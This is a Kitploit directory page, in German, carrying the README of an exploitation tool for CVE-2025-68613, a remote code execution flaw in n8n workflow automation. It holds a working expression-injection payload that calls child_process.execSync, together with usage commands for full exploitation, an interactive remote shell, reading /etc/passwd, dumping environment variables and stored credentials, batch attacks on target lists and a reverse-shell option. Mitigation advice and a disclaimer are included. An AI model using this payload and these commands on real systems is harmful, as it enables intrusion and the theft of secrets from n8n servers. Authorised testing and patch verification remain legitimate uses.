Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Workflow-Automatisierung Remote-Code-Ausführung | Kitploit
Tools/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
SchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed Teaming
Remote-Access-Tool
Payload-Entwicklung
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Workflow-Automatisierung Remote-Code-Ausführung

Repository anzeigen
532vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

n8n God Mode Ultimate – CVE-2025-68613 Scanner & Exploitation Framework

n8n God Mode Ultimate

Erweiterter n8n Workflow-Automatisierungs-RCE-Scanner & Exploitation-Tool

Python Version License CVE CVSS Score


🎯 Übersicht

n8n God Mode Ultimate ist ein umfassendes Sicherheitstest-Framework, das entwickelt wurde, um CVE-2025-68613 in n8n Workflow-Automatisierungsplattformen zu erkennen und zu validieren. Diese kritische Remote-Code-Ausführungsschwachstelle (RCE) betrifft n8n-Versionen durch Expression-Injection in Workflow-Ausführungskontexten.

CVE-2025-68613 Details
  • CVSS-Score: 10.0 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Erforderliche Privilegien: Niedrig (gültige Anmeldedaten)
  • Benutzerinteraktion: Keine
  • Schwachstellentyp: Expression Injection → Remote-Code-Ausführung

Betroffene Versionen:

  • n8n >= 0.211.0 und < 1.120.4
  • n8n >= 1.121.0 und < 1.121.1

Gepatchte Versionen:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Funktionen

🔍 Erkennung & Scanning

  • Intelligente Versionserkennung - Extrahiere n8n-Version aus den Metadaten der Anmeldeseite
  • Batch-Scanning - Multithreaded gleichzeitiges Scannen von Zielen mit Fortschrittsverfolgung
  • Mehrere Scan-Modi:
    • --detect - Nur Versionserkennung (schnellste, nicht intrusiv)
    • --safe - Sicherer Schwachstellencheck ohne Ausnutzung
    • --poc - RCE Proof-of-Concept-Validierung
    • --exploit - Vollständiger Exploitation-Modus

💣 Exploitationsfähigkeiten

  • 4 Exploitation-Techniken:
    1. Schedule-Trigger - Automatisch ausführender Workflow (zuverlässigste)
    2. Webhook-Trigger - HTTP-getriggerte Ausführung
    3. Code-Node - Direkter child_process-Zugriff
    4. Expression Injection - Manuelle Expressionsausführung

🎮 God-Mode-Funktionen

  • Interaktive Shell - Vollständige Remote-Shell mit Befehlsverlauf
  • Dateioperationen:
    • read <datei> - Remote-Dateien lesen
    • write <datei> <inhalt> - Dateien auf das Ziel schreiben
  • Umgebungsextraktion - Alle Umgebungsvariablen auslesen
  • Systeminformationen - Betriebssystemdetails, Netzwerkkonfiguration, Prozessinfo
  • Reverse Shell - Optionale Reverse-Shell-Payload-Generierung
  • Befehlsverlauf - Integrierte Verlaufsverfolgung

📊 Erweiterte Fähigkeiten

  • Credential Enumeration - Gespeicherte Anmeldedaten über API extrahieren
  • Workflow-Dumping - Alle Workflows mit Metadaten exportieren
  • Konfigurationsextraktion - Vollständigen Systemkonfigurationsdump
  • Benutzerenumeration - Alle n8n-Benutzer auflisten
  • Ausführungsprotokollanalyse - Befehlsausgaben aus Workflow-Ausführungen parsen
  • Automatisierte Bereinigung - Optionales Löschen von Workflows nach der Ausführung

🚀 Installation

Voraussetzungen

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

Abhängigkeiten installieren

root@kitploit:~
# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

Anforderungen

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Verwendung

Grundlegende Verwendung

root@kitploit:~
# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

God-Mode-Operationen

root@kitploit:~
# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Batch-Scanning

root@kitploit:~
# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

targets.txt Format:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Interaktive Shell-Befehle

Sobald Sie sich im Shell-Modus (--shell) befinden:

root@kitploit:~
n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ Befehlszeilenoptionen

Zieloptionen

root@kitploit:~
-u, --url URL             Ziel-n8n-URL
-l, --list FILE           Datei mit Ziel-URLs
-t, --threads NUM         Anzahl der Threads für Batch-Scanning (Standard: 10)

Authentifizierung

root@kitploit:~
-e, --email EMAIL         n8n-Benutzer-E-Mail
-p, --password PASS       n8n-Benutzer-Passwort

Scan-Modi

root@kitploit:~
--detect                  Nur Versionserkennung (schnellste)
--safe                    Sicherer Check ohne Ausnutzung
--poc                     RCE Proof-of-Concept
--exploit                 Vollständiger Exploitation-Modus

God-Mode

root@kitploit:~
--god                     God-Mode aktivieren
--cmd COMMAND             Einzelnen Befehl ausführen
--read-file PATH          Remote-Datei lesen
--write-file PATH         Remote-Datei schreiben
--content DATA            Inhalt für Schreiboperation
--dump-env                Alle Umgebungsvariablen extrahieren
--shell                   Interaktiver Shell-Modus
--revshell HOST:PORT      Reverse-Shell-Payload

Exploitationsoptionen

root@kitploit:~
--mode MODE               Exploit-Modus: schedule|webhook|code|expression (Standard: schedule)
--timeout SEC             Befehls-Timeout in Sekunden (Standard: 30)
--cleanup                 Workflows nach Ausführung löschen
-k, --insecure           SSL-Verifikation deaktivieren
-v, --verbose            Ausführliche Ausgabe
-q, --quiet              Minimale Ausgabe

🔬 Technische Details

Exploitationsmethodik

1. Schedule-Trigger (Empfohlen)

Erstellt einen Workflow mit einem geplanten Trigger, der alle 3 Sekunden automatisch ausgeführt wird. Zuverlässigste Methode.

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Webhook-Trigger

Erstellt einen HTTP-Webhook-Endpunkt, der bei Auslösung Befehle ausführt.

3. Code-Node

Injiziert Code direkt in einen Code-Node mit child_process-Zugriff.

4. Expression Injection

Manuelle Ausführung über das Expressionsauswertungssystem von n8n.

Versionserkennung

Extrahiert die Version aus der base64-kodierten Sentry-Konfiguration auf der Anmeldeseite:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

Verwendete API-Endpunkte

  • /rest/login - Authentifizierung
  • /rest/workflows - Workflow-CRUD-Operationen
  • /rest/credentials - Credential-Enumeration
  • /rest/executions - Abruf von Ausführungsprotokollen
  • /rest/users - Benutzerenumeration
  • /rest/settings - Systemkonfiguration

📊 Ausgabebeispiele

Versionserkennung

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] Ziel: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VERWUNDBAR (< 1.120.4)

RCE Proof-of-Concept

root@kitploit:~
[*] Authentifizierung erfolgreich
[*] Erstelle Exploitation-Workflow...
[*] Workflow-ID: hd6LxSY765WBThqd
[*] Führe Befehl aus: whoami
[✓] Befehl erfolgreich ausgeführt!
[+] Ausgabe: root

Interaktive Shell

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] Umgebungsvariablen:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ Abwehrmaßnahmen

Sofortmaßnahmen

  1. Upgrade auf gepatchte Version (>= 1.120.4 oder >= 1.121.1)
  2. Standard-Anmeldedaten deaktivieren ([email protected]:admin)
  3. Starke Authentifizierung implementieren (MFA empfohlen)
  4. Netzwerksegmentierung - Zugriff auf n8n-Instanz einschränken
  5. Workflows prüfen - Alle aktiven Workflows überprüfen
  6. Ausführungsprotokolle überwachen - Nach verdächtigen Aktivitäten suchen

Langfristige Härtung

  • Überwachungsprotokollierung aktivieren
  • IP-Whitelisting implementieren
  • OAuth/SSO-Authentifizierung verwenden
  • Regelmäßige Sicherheitsbewertungen
  • n8n aktualisiert halten
  • Datenbankverschlüsselung im Ruhezustand
  • Sichere Anmeldedatenspeicherung
  • Netzwerkverkehrsüberwachung

⚠️ Rechtlicher Haftungsausschluss

NUR FÜR AUTORISIERTE SICHERHEITSTESTS

Dieses Tool wird zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt. Benutzer müssen alle geltenden Gesetze und Vorschriften einhalten.

⚖️ Rechtliche Anforderungen

SIE MÜSSEN:

  • ✅ Schriftliche Genehmigung vor dem Test einholen
  • ✅ Nur auf Systemen verwenden, die Ihnen gehören oder für die Sie eine Testberechtigung haben
  • ✅ Verantwortungsvolle Offenlegungspraktiken einhalten
  • ✅ Geltende Gesetze und Vorschriften befolgen
  • ✅ Für defensive Sicherheitszwecke verwenden

SIE DÜRFEN NICHT:

  • ❌ Systeme ohne explizite Erlaubnis testen
  • ❌ Für böswillige Zwecke verwenden
  • ❌ Denial-of-Service-Angriffe durchführen
  • ❌ Daten ohne Autorisierung exfiltrieren oder ändern
  • ❌ Ohne Zustimmung auf Produktionssystemen einsetzen

📜 Haftung

Der Autor übernimmt KEINE Verantwortung für Missbrauch dieses Tools. Unbefugter Zugriff auf Computersysteme ist illegal gemäß:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act - UK
  • EU Cybercrime Directive
  • Ähnliche Gesetze weltweit

Nutzung auf eigene Gefahr. Sie sind für Ihre Handlungen verantwortlich.


🤝 Mitwirken

Beiträge sind willkommen! Bitte befolgen Sie diese Richtlinien:

  1. Repository forken
  2. Feature-Branch erstellen (git checkout -b feature/improvement)
  3. Änderungen committen (git commit -am 'Add new feature')
  4. In den Branch pushen (git push origin feature/improvement)
  5. Pull-Request erstellen

Verhaltenskodex

  • Verantwortungsvolle Offenlegungspraktiken befolgen
  • Sicherheitsfunktionen klar dokumentieren
  • Ordnungsgemäße Fehlerbehandlung einfügen
  • Kommentare für komplexe Logik hinzufügen
  • Vor dem Einreichen gründlich testen

📚 Referenzen

CVE-Informationen

  • CVE-2025-68613 - NVD
  • n8n Security Advisories

n8n Dokumentation

  • n8n Offizielle Dokumentation
  • n8n API-Referenz
  • n8n Sicherheits-Best-Practices

Sicherheitsforschung

  • Expression Injection Schwachstellen
  • Workflow-Automatisierungssicherheit

👨‍💻 Autor

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • Website: https://www.satyamrastogi.com
  • Twitter: @hackersatyamrastogi

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.

root@kitploit:~
MIT-Lizenz

Copyright (c) 2025 Satyam Rastogi

Hiermit wird jeder Person, die eine Kopie dieser Software und der zugehörigen Dokumentationsdateien (die "Software") erhält, kostenlos die Erlaubnis erteilt, die Software ohne Einschränkung zu nutzen, einschließlich und ohne Einschränkung der Rechte zur Nutzung, Vervielfältigung, Änderung, Zusammenführung, Veröffentlichung, Verteilung, Unterlizenzierung und/oder zum Verkauf von Kopien der Software, und Personen, denen die Software zur Verfügung gestellt wird, dies unter den folgenden Bedingungen zu gestatten:

Der obige Urheberrechtshinweis und dieser Genehmigungshinweis müssen in allen Kopien oder wesentlichen Teilen der Software enthalten sein.

DIE SOFTWARE WIRD "WIE BESEHEN" ZUR VERFÜGUNG GESTELLT, OHNE JEGLICHE AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GEWÄHRLEISTUNG, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN DRITTER.

🌟 Danksagungen

  • n8n-Team für den Bau einer großartigen Workflow-Automatisierungsplattform
  • Sicherheitsforscher in der n8n-Community
  • Open-Source-Sicherheitstools, die dieses Projekt inspiriert haben

📞 Unterstützung

Für Sicherheitsprobleme melden Sie sich bitte verantwortungsbewusst:

  • Sicherheitsprobleme: Ein privates Sicherheitsadvisory öffnen
  • Fehlerberichte: GitHub Issues nutzen
  • Funktionsanfragen: Eine GitHub-Diskussion eröffnen

⭐ Vergib einen Stern für dieses Repository, wenn du es nützlich fandest!

Gemacht mit 💻 von Sicherheitsforschern, für Sicherheitsforscher

Tool herunterladen